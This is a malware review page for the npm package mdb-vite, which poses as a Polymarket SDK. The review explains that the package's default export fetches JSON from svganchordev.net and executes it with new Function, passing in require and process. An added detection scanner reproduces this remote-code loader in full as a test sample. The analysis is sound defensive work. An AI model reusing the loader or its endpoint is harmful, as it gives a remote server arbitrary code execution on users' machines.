
mdb-vite@1.5.2

TypeScript SDK for the Polymarket CLOB API.

AI Security Review

scanned 9h ago · by lpm-firewall-ai

The package's default export fetches remote JSON and executes its credits field as JavaScript, handing it Node globals. This is remote code execution on first runtime use, and it has nothing to do with the package's advertised purpose.

Static reason
One or more suspicious static signals were detected; the source fingerprint signature matched a known malicious package; routed for source-aware review.
Trigger
User or application imports and invokes the default export from index.js.
Impact
Remote server can run arbitrary code in the consumer process with require/process access.
Mechanism
remote fetch followed by Function constructor execution
Attack narrative
On runtime invocation, getPlugin fetches JSON from svganchordev.net/icons/107, extracts data.credits, compiles it with new Function, and supplies Node capabilities including require, process, global, Buffer, and module exports. The advertised Polymarket SDK functionality is absent, making the remote loader deceptive and capable of arbitrary payload delivery.
Rationale
Direct source inspection confirms a deceptive facade (package.json and README describe a Polymarket SDK) over runtime remote code execution from an attacker-controlled endpoint. The absence of lifecycle hooks limits the install-time blast radius but does not change the concrete malicious runtime behavior.
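The mechanism above (a remote fetch whose response is compiled with the Function constructor and handed require/process) is a pattern a reviewer can check for statically. The following is an added example, not lpm-firewall-ai's scanner and not code from the package: a heuristic scanner that locates Function-constructor call sites, lists which Node capabilities their parameter list names, checks whether the body argument is a runtime value rather than a literal, and pairs that with any absolute URLs and HTTP calls in the source. It is regex plus a quote- and bracket-aware scan, not an AST parser, so hits are leads for manual review. Both input samples are constructed here: the malicious one is modeled on the index.js lines this review quotes (same URL and parameter list; the trailing invocation is inferred from the review's narrative), and the benign one uses a placeholder host.

```javascript
// Added example, not lpm-firewall-ai's scanner: a heuristic static check for the
// "remote fetch -> new Function(...)" loader pattern described in this review.

// Parameter names that hand Function-constructor code real Node capabilities.
const NODE_CAPABILITIES = new Set(['require', 'module', 'exports', 'process',
  'global', 'Buffer', '__dirname', '__filename', 'setTimeout', 'setInterval',
  'clearTimeout', 'clearInterval']);

// Collect the top-level arguments of the call whose '(' sits at src[open],
// skipping string literals and nested brackets. Returns null if unbalanced.
function callArgs(src, open) {
  const args = [];
  let cur = '', depth = 0, quote = null;
  for (let i = open; i < src.length; i++) {
    const c = src[i];
    if (quote) {                                   // inside a string literal
      cur += c;
      if (c === '\\') cur += src[++i] ?? '';       // keep escaped char verbatim
      else if (c === quote) quote = null;
      continue;
    }
    if (c === '"' || c === "'" || c === '`') quote = c;
    else if ('([{'.includes(c)) { depth++; if (i === open) continue; }
    else if (')]}'.includes(c) && --depth === 0) {
      if (cur.trim()) args.push(cur.trim());
      return args;
    } else if (c === ',' && depth === 1) { args.push(cur.trim()); cur = ''; continue; }
    cur += c;
  }
  return null;
}

const isLiteral = (s) => /^(['"`])[\s\S]*\1$/.test(s);

// Each Function-constructor call site: line, Node capabilities named in its
// parameter list, and whether the body argument is a runtime value.
function findFunctionConstructors(src) {
  const hits = [];
  const re = /\b(?:new\s+)?Function\s*\(/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const args = callArgs(src, m.index + m[0].length - 1);
    if (!args || args.length === 0) continue;
    const params = args.slice(0, -1).filter(isLiteral).map((s) => s.slice(1, -1));
    hits.push({
      line: src.slice(0, m.index).split('\n').length,
      capabilities: params.filter((p) => NODE_CAPABILITIES.has(p)),
      dynamicBody: !isLiteral(args[args.length - 1]),
    });
  }
  return hits;
}

// Hostnames of every absolute http(s) URL that appears in the source text.
function findRemoteHosts(src) {
  const hosts = new Set();
  for (const m of src.matchAll(/https?:\/\/[^\s'"`)]+/g)) {
    try { hosts.add(new URL(m[0]).hostname); } catch { /* malformed: skip */ }
  }
  return [...hosts];
}

function scanSource(src) {
  const ctors = findFunctionConstructors(src);
  const hosts = findRemoteHosts(src);
  const usesFetch = /\b(?:fetch|https?\.(?:get|request))\s*\(/.test(src);
  const findings = ctors.map((c) => ({ severity: 'High', kind: 'Eval', ...c }));
  if (hosts.length) findings.push({ severity: 'Medium', kind: 'Network', hosts });
  // The loader pattern: something is fetched, and a Function constructor compiles
  // a non-literal body while granting it require- or process-level access.
  const loader = usesFetch && ctors.some((c) => c.dynamicBody &&
    (c.capabilities.includes('require') || c.capabilities.includes('process')));
  return { findings,
    mechanism: loader ? 'remote fetch followed by Function constructor execution' : null };
}

// Constructed sample modeled on the index.js lines this review quotes.
const MALICIOUS_SAMPLE = `async function getPlugin() {
  const res = await fetch('https://svganchordev.net/icons/107');
  const data = await res.json();
  // Note: The code uses async/await, so we need to handle that
  const evalFn = new Function(
    'require', 'module', 'exports', '__dirname', '__filename', 'console',
    'process', 'global', 'Buffer', 'setTimeout', 'setInterval',
    'clearTimeout', 'clearInterval', 'Promise',
    data.credits
  );
  return evalFn(require, module, exports, __dirname, __filename, console, process,
    global, Buffer, setTimeout, setInterval, clearTimeout, clearInterval, Promise);
}
module.exports = getPlugin;
`;

// Constructed benign sample: a fixed-endpoint HTTP client (placeholder host).
const BENIGN_SAMPLE = `const https = require('https');
function getMarket(id, cb) {
  https.get('https://api.example.com/markets/' + id, (res) => {
    let body = '';
    res.on('data', (d) => { body += d; });
    res.on('end', () => cb(null, JSON.parse(body)));
  }).on('error', cb);
}
module.exports = { getMarket };
`;

console.log(JSON.stringify(scanSource(MALICIOUS_SAMPLE), null, 2));
console.log(scanSource(BENIGN_SAMPLE).mechanism); // null
```

Run it with node. The malicious sample produces a High Eval finding at line 5 naming twelve capabilities (console and Promise are deliberately not counted) plus a Medium Network finding for svganchordev.net, and the mechanism string matches the one in this review; the benign sample, which also talks to the network, yields only the Network finding and no mechanism, which is the distinction that matters: network access alone is not the signal, network access feeding a Function constructor with require in scope is.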
Evidence
  • package.json
  • README.md
  • index.js
Network endpoints (2)
  • svganchordev.net/icons/107
  • cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/svgs/brands/

Decision evidence

public snapshot
AI called this Malicious at 98.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js:114-119 default export fetches https://svganchordev.net/icons/107 when invoked.
  • index.js:127-153 parses JSON and passes data.credits into new Function.
  • index.js:130-170 remote code receives require, process, global, Buffer, timers, and module exports.
  • package.json:4 and README claim Polymarket SDK, but index.js implements remote icon/plugin loader instead.
Evidence against
  • package.json has no install/preinstall/postinstall lifecycle hooks.
  • Remote fetch/eval is not import-time; it requires calling the exported function.
  • No package file directly establishes persistence or targets AI-agent control surfaces.
Behavioral surface
Source
  • Eval
  • Network
Supply chain
No supply-chain packaging signals triggered.
Manifest
No manifest risk signals triggered.
scanned 1 file(s), 5.94 KB of source

Source & flagged code

2 flagged
index.js
149  // Note: The code uses async/await, so we need to handle that
150  const evalFn = new Function(
151    'require', 'module', 'exports', '__dirname', '__filename', 'console', 'process', 'global', 'Buffer', 'setTimeout', 'setInterval', 'clearTimeout', 'clearInterval', 'Promise',
High
Eval

Package source references dynamic code evaluation.

index.js, line 149
matchType = malicious_source_fingerprint_signature
signature = c06bd55d669269cb
signatureType = suspicious_hashes
sourceLabel = final_verdict:malicious
matchedPackage = gamified-trading-system@3.6.2
matchedPath = index.js
matchedIdentity = npm:Z2FtaWZpZWQtdHJhZGluZy1zeXN0ZW0:3.6.2
similarity = 1.000
shingleOverlap = 1
summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.js

Findings

2 High, 1 Medium, 1 Low
  • High: Eval (index.js)
  • High: Known Malware Source Fingerprint Signature (index.js)
  • Medium: Network
  • Low: Scripts Present